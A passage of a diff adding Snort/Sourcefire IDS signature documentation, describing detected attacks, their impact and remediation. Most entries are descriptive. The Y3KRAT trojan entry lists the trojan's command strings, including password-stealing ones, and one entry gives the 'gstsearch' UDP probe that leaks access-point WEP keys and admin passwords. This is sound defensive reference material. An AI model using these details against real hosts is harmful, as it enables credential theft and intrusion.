+Summary:
+This event is generated when a network host generates an ICMP datagram
+with Record Route IP options.
+
+--
+
+Impact:
+Packets containing IP Record Route options are used to emulate the functionality
+of traceroute. 
+
+--
+
+Detailed Information:
+The Record Route IP option is used to store routing information about the
+path a datagram takes to its destination.  ICMP ECHO packets with an IP header
+utilizing the Record Route option are used to emulate the functionality of
+traceroute.
+
+--
+
+Attack Scenarios:
+A remote attacker may attempt to use the Record Route IP option to determine
+routing information if traceroute fails.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of datagram.
+
+--
+
+False Positives:
+Network diagnostic tools may generate these types of datagrams.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to block incoming datagrams with the IP Record Route option.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS238
+
+
+--
--- /dev/null
+++ b/doc/signatures/2977.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2977
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/524.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid: 524
+
+--
+Summary:
+This event is generated when TCP traffic to port 0 is detected. This 
+should not be seen in normal TCP communications.
+
+--
+Impact:
+Possible reconnaisance. This may be an attempt to verify the existance 
+of a host or hosts at a particular address or address range.
+
+--
+Detailed Information:
+TCP traffic to port 0 is not valid under normal circumstances.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	Any
+
+--
+Attack Scenarios:
+The attacker could send packets to a host with a destination port of 0. 
+The attacker might also be using hping to verify the existance of a host
+as a prelude to an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow TCP traffic to port 0.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1105.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1105
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/115-1.txt
@@ -0,0 +1,71 @@
+
+
+Rule:
+
+--
+Sid:
+115-1
+
+--
+Summary:
+This event is generated when the pre-processor asn1 detects network
+traffic that may constitute an attack. Specifically an indefinite asn.1
+length encoding was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the asn1 pre-processor detects network
+traffic that may consititute an attack.
+
+Indefinite Lengths are conceptually like BLOB data.  The upper bit of
+the first byte is set to one, and the bottom seven bits are zero.  The
+data value follows immediately, and continues until two zero-bytes are
+encountered.
+
+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
--- /dev/null
+++ b/doc/signatures/3333.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3333
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2179.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+
+Sid:
+2179
+
+--
+
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	SmallFTP v0.99
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+SmallFTPD has released an updated software package that resolve the 
+problem. It can be downloaded from:
+http://smallftpd.free.fr
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.securityfocus.com/bid/7474
+
+--
--- /dev/null
+++ b/doc/signatures/1966.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1966
+
+--
+Summary:
+This event is generated when an attempt is made to discover sensitive information associated with a Global Sun Technology wireless access point. 
+
+--
+Impact:
+Information disclosure.  A successful attack may return the administrative password along with other sensitive information about a wireless access point. 
+
+--
+Detailed Information:
+Global Sun Technology Inc. is a developer of Wireless Access Points for wireless vendors such as Wisecom, D-Link, as well as others.  There is a flaw in the code distributed by Global Sun Technology that allows an attacker to send a packet to UDP port 27155 with a string of "gstsearch" in the payload to the wireless access point, returning the Wired Equivalent Privacy (WEP) encryption keys, the MAC adress, and the administrative password. 
+
+--
+Affected Systems:
+
+  WISECOM GL2422AP-0T
+  D-Link DWL-900AP+ B1 version 2.1 and 2.2
+  ALLOY GL-2422AP-S
+  EUSSO GL2422-AP
+  LINKSYS WAP11-V2.2
+  DI-614+ Firmware version 2.03
+
+--
+Attack Scenarios:
+An attacker may use this exploit to obtain valuable information about the administration of the access point as a precursor for attempting to take control and administer the access point. 
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of firmware for the access point.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6100
+
+
+--
--- /dev/null
+++ b/doc/signatures/2166.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2166
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3003.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+3003
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the Microsoft implementation of
+the ASN.1 Library. It may be possible for an attacker to exploit this
+condition by sending specially crafted authentication packets to a host
+running a vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2392.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2392
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with WuFtpd RETR command.
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+WuFtpd is an FTP server based on BSD ftpd. A vulnerability exists 
+with the RETR command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the RETR 
+command.
+
+The issue exists in the realpath() function. It is possible for an
+attacker to send malformed data to the realpath() function that will
+cause the overflow condition to occur.
+
+--
+Affected Systems:
+	Multiple systems using affected C libraries, libc
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the overflow to occur.
+
+--
+Ease of Attack:
+Simple.  Many exploits exist.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use scp as an alternative to ftp
+
+Disallow ftp access to internal resources from external sources
+
+Recompile binaries statically linked to the system libc implementation
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000772.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000772
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "DokiWiki" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "DokiWiki" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000724.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000724
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "profile.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "profile.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1986.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 1986
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3083.txt
@@ -0,0 +1,141 @@
+Rule: 
+
+--
+Sid: 
+3083
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 server attempts to confirm the client's response.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Simple
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/471.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+
+Sid:
+471
+
+--
+
+Summary:
+This event is generated when Icmpenum v1.1.1 generates an ICMP datagram.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+Icmpenum v1.1.1 generates an ICMP Type 0 datagram with an ICMP ID of 666, an ICMP
+sequence number of 0, and an ICMP datagram size of 0.  
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  Packet generation tools can generate this type of ICMP packet
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP Echo requests with
+user-defined payloads that emulate this application.
+
+--
+
+Corrective Action:
+To prevent information gathering, use ingress filtering to block
+incoming ICMP Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.whitehats.com/info/IDS450
+
+
+--
--- /dev/null
+++ b/doc/signatures/936.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+936
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/647.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+647
+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3056.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3056
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000125.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000125
+
+-- 
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the 
+SafeNet Sentinel License Manager.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with system 
+privileges is possible.
+
+--
+Detailed Information:
+If the SafeNet Sentinel License Manager recieves a packet containing over 1,000 
+bytes, a buffer will be overflowed. If properly crafted data is sent, arbitrary 
+code may be executed with system privileges.
+
+--
+Affected Systems:
+SafeNet Sentinel License Manager 7.2.0.2
+
+--
+
+Attack Scenarios: 
+A script must be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as an attack is included as part of the Metasploit vulnerability 
+testing framework.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to version 8.0 of the affected software.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/538.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+538
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-1.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-1
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
